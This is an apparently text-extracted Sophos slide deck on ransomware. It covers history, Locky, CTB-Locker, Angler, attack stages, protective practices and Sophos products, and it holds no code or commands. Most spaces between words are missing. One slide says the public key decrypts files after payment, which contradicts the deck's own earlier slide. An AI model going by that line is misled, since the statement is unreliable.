View
11
Download
0
Category
Preview:
Citation preview
1
JoannaWziątek-ŁadoszSalesEngineer,Sophos
Ransomware:isthereanywayyoucanprotectyourself?
2
Whatwe’regoingtocover
• Ransomwareorigins• Anatomyofaransomwareattack• Thelatestransomware – introducingLocky anditsfriends• Whytheseattacksaresosuccessful• Practicalstepstoprotectyourorganizationfromransomwarethreats• HowSophoscanhelp
3
HistoryofRansomware
• Thefirstknownransomwarewasfoundin1989
• AIDSTrojan/PCBorgmalware.
• Aninfectedcomputerwoulddisplayamessagetotheuserthatoneoftheirprogramshadexpiredandtheyneededtopay$189tohaveitrestored.
• Thecreatorwaseventuallycaughtandtheransomwaregenrewentundergroundforseveralyears,thoughitreappearedbrieflyin2005and2006.
4
5
6
7
8
Cryptolocker
• WiththeriseofCryptoLocker in2013,acriminalgangfirstdemonstratedtheabilitytoreliablycombineremoteencryptionwithremoteextortiononamassscale.
• CryptoLocker wastakendownbylawenforcementauthoritiesinMay2014,andforthenextseveralmonths,therewasasignificantreductionintheprevalenceofransomware.
• Itnotonlyshowedhowencryptingransomwarecouldbemadetowork:italsoshowedjusthowlucrativethismalwarebusinesscouldbe.
• AccordingtoUSDepartmentofJusticefilings,CryptoLocker earned$27,000,000foritsownersinjusttwomonths.
9
10
11
Growth
Howmanypercenthas ransomwareincreasedbetween2014and2015?
Answer:About170%Thereasonfortheriseissimple–ransomwareworks.
Datasofarshowsthatthisfigurefor2016willatleastdouble.
12
Facts about encyption• Cryptolockernormally uses AES256-bitencryption.But inlaterversionsthey havechanged this toAES128-bitencryption.
Filetypesthatusuallyareencrypted:
*.3fr,*.accdb,*.ai,*.arw,*.bay,*.cdr,*.cer,*.cr2,*.crt,*.crw,*.h,*.dbf,*.dcr,*.der,*.dng,*.doc,*.docm,*.docx,*.dwg,*.dxf,*.dxg,*.eps,*.erf,*.indd,*.jpe,*.jpg,*.kdc,*.mdb,*.mdf,*.mef,*.mrw,*.nef,*.nrw,*.odb,*.odm,*.odp,*.ods,*.odt,*.orf,*.p12,*.p7b,*.p7c,*.pdd,*.pef,*.pem,*.pfx,*.ppt,*.pptm,*.pptx,*.psd,*.pst,*.ptx,*.r3d,*.raf,*.raw,*.rtf,*.rw2,*.rwl,*.srf,*.srw,*.wb2,*.wpd,*.wps,*.xlk,*.xls,*.xlsb,*.xlsm,*.xlsx
13
2mainvectorsofattack
• SPAM (viasocialengineering)○ Seeminglyplausiblesender○ Hasattachmente.g.invoice,parceldeliverynote○ Theattachmentcontainsanembeddedmacro○ Whentheattachmentisopenedthemacrodownloads
andthenexecutestheransomwarepayload○ UsedbyLocky,TorrentLocker,CTB-Locker
• Exploitkits○ Blackmarkettoolsusedtoeasilycreateattacksthat
exploitknownorunknownvulnerabilities(zero-day)○ ClientsidevulnerabilitiesusuallytargettheWebbrowser○ UsedbyAngler,CryptoWall,TeslaCrypt,CrypVault,
ThreatFinder
1414
Anatomyofaransomwareattack
15
Anatomyofaransomwareattack
Andgone
Theransomwarewillthendeleteitselfleavingjusttheencryptedfilesandransomnotesbehind.
Ransomdemand
Amessage appearsontheuser’sdesktop,explaininghowaransom(oftenintheformofbitcoins)canbepaidwithinatimeframeofe.g.72hourstoenabledecryptionofthedatawiththeprivatekeythatonlytheattacker’ssystemhasaccessto.
Encryptionofassets
Certainfilesarethenencryptedonthelocalcomputerandonallaccessiblenetworkdriveswiththispublickey.AutomaticbackupsoftheWindowsOS(shadowcopies)areoftendeletedtopreventdatarecovery.
Contactwiththecommand&controlserveroftheattacker
TheransomwaresendsinformationabouttheinfectedcomputertotheC&Cserveranddownloadsanindividualpublickeyforthiscomputer.
Installationviaanexploitkitorspamwithaninfectedattachment
Onceinstalledtheransomwaremodifiestheregistrykeys
16
Ransomdemands
17
Payingransoms
• PaymentismadeinBitcoins• InstructionsareavailableviaTor• Theransomincreasesthelongeryoutaketopay
• Onpaymentoftheransom,thepublicencryptionkeyisprovidedsoyoucandecryptyourcomputerfiles
1818
Commonransomware:Locky andfriends
19
Locky:thenewkidontheblock
• Nicknameofanewstrainofransomware,so-calledbecauseitrenamesallyourimportantfilessothattheyhavetheextension .locky
• RansomsvaryfromBTC 0.5toBTC 1.00(1BTCisworthabout$400/£280).• Startedhittingtheheadlinesinearly2016• Wreakinghavocwithatleast400,000machinesaffectedworldwide
20
AcommonLocky attack
• Youreceiveanemailcontaininganattacheddocument.○ Thedocumentlookslikegobbledegook.○ Thedocumentadvisesyoutoenablemacros“ifthedataencodingisincorrect.”
○ Thecriminalswantyoutoclickonthe'Options'buttonatthetopofthepage.
• OnceyouclickOptions,Lockywillstarttoexecuteonyourcomputer.
• Assoonasitisreadytoaskyoufortheransom,itchangesyourdesktopwallpaper.
• Theformatofthedemandvaries,buttheresultsarethesame.
21
CTB-Locker
• Peculiarity:Businessmodelbasedonaffiliations○ Infectionsareconductedby'partners'whoreceiveinreturnaportionofthetakings○ Enablesfasterspreadingofmaliciouscode○ ApproachnotablyusedinthepastbyFake-AV
• Thecybercrooksoffer theoptionofamonthlypayment• HasalsobeenwidelydistributedbytheRigandNuclearexploitkits• AswithTorrentLocker, themajorityofinfectionshavestartedviaspamcampaigns
22
CTB-Lockervariantthatattackswebsites
• SamenameastheransomwarethatattacksWindowscomputers• WritteninPHP• FirstattackintheUKon12thFebruary2016• Alreadymanyhundredsofsiteshavebeenattacked• Attackswebsitesbyencryptingallfilesintheirrepositories• Apassword-protected‘shell’isinstalledonmostoftheaffectedsites,allowingattackerstoconnecttotheserver(s) viaabackdoor
23
Angler:anall-too-well-knownexploitkit
• Growninnotorietysincemid2014○ Thepayloadisstoredinmemoryand
thediskfileisdeleted○ Detectssecurityproductsandvirtual
machines○ Abilitytospreadmanyinfections:
bankingTrojans,backdoor,rootkits,ransomware
• Easytouse○ Doesn’trequireanyparticulartechnical
competence○ AvailableforafewthousandUSDonthe
DarkWeb
24
Angler’sevolutionintothedominantexploitkit
Sep2014 Jan2015 May 2015
25
ChainofinfectionforAnglerexploitkits1. Thevictimaccesses acompromisedwebserver
throughavulnerablebrowser2. Thecompromisedwebserverredirectsthe
connectiontoanintermediaryserver3. Inturn,theintermediaryserverredirectsthe
connectiontotheattacker’sserverwhichhoststhedestinationpageoftheexploitkit
4. Thedestinationpagelooksforvulnerableplug-ins(Java,Flash,Silverlight)andtheirversionnumbers
5. Ifavulnerablebrowserorpluginisdetectedtheexploitkitreleases itspayloadandinfectsthesystem.
26
2727
Whytheseattacksaresosuccessful
28
Whyaretheseattackssosuccessful?Professionalattacktechnology• Highlyprofessionalapproache.g.usuallyprovidestheactualdecryptionkeyafterpaymentoftheransom
• Skillfulsocialengineering• Hidemaliciouscodeintechnologiesthatarepermittedinmanycompaniese.g.MicrosoftOfficemacros,JavaScript,VBScript,Flash…
29
Whyaretheseattackssosuccessful?Securityweaknessesintheaffectedcompanies• Inadequatebackupstrategy• Updatesandpatchesarenotimplementedswiftlyenough• Dangeroususer/rightspermissions– morethantheyneed• Lackofusersecuritytraining• Securitysystemsarenotimplementedorusedcorrectly• LackofITsecurityknowledge• Conflictingpriorities:securityvsproductivityconcerns
3030
Practicalstepstoprotectagainstransomware
31
Bestpractices– dothisNOW!
1. Backupregularlyandkeeparecentbackupcopyoff-site.2. Don’tenablemacrosindocumentattachmentsreceivedviaemail.3. Becautiousaboutunsolicitedattachments.4. Don’tgiveyourselfmoreloginpowerthanyouneed.5. ConsiderinstallingtheMicrosoftOfficeviewers.6. Patchearly,patchoften.7. Configureyoursecurityproductscorrectly.
32
Securitysolutionrequirements
Asaminimumyoushould:• Deployantivirusprotection• Blockspam• Useasandboxingsolution• Blockriskyfileextensions(javascript,vbscript,chmetc…)• Passwordprotectarchivefiles• UseURLfiltering(blockaccesstoC&Cservers)• UseHTTPSfiltering• UseHIPS(hostintrusionpreventionservice)• Activateyourclientfirewalls• Useawhitelistingsolution
33
Additionalsteps
• Employeeawareness&training○ SophosITSecurityDosandDon’ts○ SophosThreatsaurus
• Segmentthecompanynetwork○ NACsolutionsensureonlyknowncomputerscanaccessthenetwork○ Separatefunctionalareaswithinafirewalle.g.clientandservernetworks
• Encryptcompanydata○ Itdoesn’tstoptheransomwarebutpreventsdamagecausedbysensitivedocumentsgettingintothewronghands
• Usesecurityanalysistools○ Ifaninfectiondoesoccur,it’svitalthatthesourceisidentifiedandcontainedASAP.
3434
HowSophoscanhelp
35
Complete protection:EnduserandNetwork
SophosCentral
EnduserNetwork
Next-GenFirewall/UTM
WebSecurity
EmailSecurity
WirelessSecurity
SafeGuardEncryption
MobileControl
Next-GenEndpointProtection
ServerSecurity
SecuretheEndpoint(PC/Mac)
NextGenEndpoint securitytoprevent,detect,investigateand
remediate
SecuretheMobileDeviceSecuresmartphonesandtabletsjustlikeanyotherendpoint
SecuretheServersProtectionoptimizedforserverenvironment(physicalorvirtual):
fast,effective,controlled
ProtecttheDataSimple-to-useencryptionforahighlyeffectivelastlineofdefenseagainstdataloss
SecurethePerimeterUltimateenterprisefirewallperformance,security,and
control.
SecuretheWebAdvancedprotection,control,andinsightsthat’seffective,
affordable,andeasy.
SecuretheEmailEmailthreatsandphishingattacks
don’t standachance.
SecuretheWirelessSimple,secureWi-Fi
connection.
36
SecurityasaSystem
SynchronizedSecurityIntegrated,context-awaresecuritywhereEnduser andNetworktechnology sharemeaningful informationtodeliverbetterprotection
SecuritymustbecomprehensiveThecapabilities requiredtofully satisfy customerneed
SecuritycanbemadesimplePlatform,deployment,licensing, userexperience
SecurityismoreeffectiveasasystemNewpossibilities throughtechnologycooperation
NextGenEnduserSecurity
NextGenNetworkSecurity
SophosCloud
heartbeat
SOPHOSLABS
37
MaliciousTrafficDetection
SOPHOSSYSTEMPROTECTOR
ApplicationTracking
ThreatEngine
ApplicationControl
Emulator DeviceControl
WebProtection
IoCCollector
LiveProtection
SecurityHeartbeat
HIPS/RuntimeProtection
Reputation
MaliciousTraffic
Detection
Soph
osL
abs
URLdatabase
MalwareIdentities HIPSrulesGenotypesFilelook-up Reputation Apps SPAM
DataControl
PeripheralTypes
Anon.proxies
Patches/VulnerabilitiesWhitelist
Administratoralerted
Application interrupted
i Compromise
User|System|File
MTDrules
Malicious trafficdetected
MaliciousTraffic
Detection
38
SophosSandstorm
HowSophosSandstormworks
1. Ifthefilehasknownmalwareit’sblockedimmediately.Ifit’sotherwisesuspicious,andhasn’tbeenseenbefore,itwillbesenttothesandboxforfurtheranalysis.Whenwebbrowsing,usersseeapatiencemessagewhiletheywait.
2. Thefileisdetonatedinthesafeconfinesofthesandboxandmonitoredformaliciousbehaviour.Adecisiontoalloworblockthefilewillbesenttothesecuritysolutiononcetheanalysisiscomplete.
3. Adetailedreportisprovidedforeachfileanalyzed.
AdvancedThreatDefense MadeSimple
SecureWebGateway
SecureEmailGateway
UnifiedThreatManagement
Next-GenFirewall
3939
Questions?
40© Sophos Ltd. All rights reserved.
Recommended